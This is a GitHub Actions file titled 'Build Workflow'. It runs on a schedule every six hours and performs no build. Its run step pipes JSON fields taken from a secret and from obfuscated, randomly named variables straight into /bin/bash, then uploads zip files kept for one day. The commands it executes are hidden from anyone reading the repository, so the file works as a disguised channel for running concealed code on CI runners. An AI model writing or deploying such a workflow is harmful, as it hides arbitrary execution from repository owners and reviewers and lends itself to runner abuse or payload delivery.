name: Build Workflow
on:
  workflow_dispatch:

  schedule:
    - cron: '35 0,6,12,18 * * *'
permissions:
  contents: read
  actions: read
concurrency:
  group: ${{ github.workflow }}
  cancel-in-progress: false
jobs:
  execute:
    name: Main task
    runs-on: ubuntu-latest
    steps:
      - name: Checkout
        uses: actions/checkout@v4
      - name: Run
        env:
          ptofv85373: ${{ secrets.ptofv85373 }}
        run: |
          printf '%s' "$ptofv85373" | jq -r .rmswu14 | /bin/bash
          printf '%s' "$qgt5" | jq -r .y49625 | /bin/bash
          echo $ff22287 | jq -r .as37 | /bin/bash

      - name: Store results
        uses: actions/upload-artifact@v4
        with:
          name: ah90DvBc
          path: "*.zip"
          retention-days: 1
